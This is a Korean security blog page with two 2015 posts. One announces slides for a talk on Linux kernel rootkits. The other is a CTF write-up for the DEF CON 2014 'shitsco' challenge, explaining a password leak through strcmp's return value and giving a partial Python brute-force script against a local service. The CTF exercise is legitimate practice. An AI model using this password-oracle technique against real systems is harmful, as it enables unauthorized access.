'2015/05/08'에 해당되는 글 2건

  1. 2015.05.08 Codegate Junior Seminar 2015 발표자료
  2. 2015.05.08 [defcon ctf 2014] shitsco

코드게이트 측에서 발표자료를 올려주는줄 알았는데 안올려주시더라구요.

그래서 좀 늦은 감이 없지않아 있지만.. 발표자료 첨부합니다.

발표주제는 Hacking Linux Kernel with Rootkit 입니다.

Hacking Kernel with Rootkit.pdf


Posted by xer0s :

데프콘 준비겸 작년도꺼 문제들 풀어보는중..

취약점은 password를 입력받는과정에서 strcmp의 리턴값을 저장할 수 있는 변수를 릭함으로써 password를 알아낼수 있다는것!


from pwn import *

from socket import *

string = ""

s = socket(AF_INET, SOCK_STREAM)

s.connect(("localhost", 31335))

print recvUntil(s, "$")

for i in range(32):

for j in range(0x80, 0x20, -1):

tmp = chr(j)


print s.recv(1024)

payload = ""

payload += string+tmp

payload += "\x20"*(26-(i+1))


if chr(0xff) not in s.recv(1024):

string += chr(j)


print "Key is : "+string

'General News > Write-Ups' 카테고리의 다른 글

[ConfidenceCTF-teaser]Power level  (0) 2015.04.28
[ConfidenceCTF-teaser]Apache Underwear  (0) 2015.04.28
[ConfidenceCTF-teaser]Pratical-Numerology  (0) 2015.04.28
HackIM nullcon exploitation400  (0) 2015.01.11
HackIM nullcon exploitation300  (0) 2015.01.11
Posted by xer0s :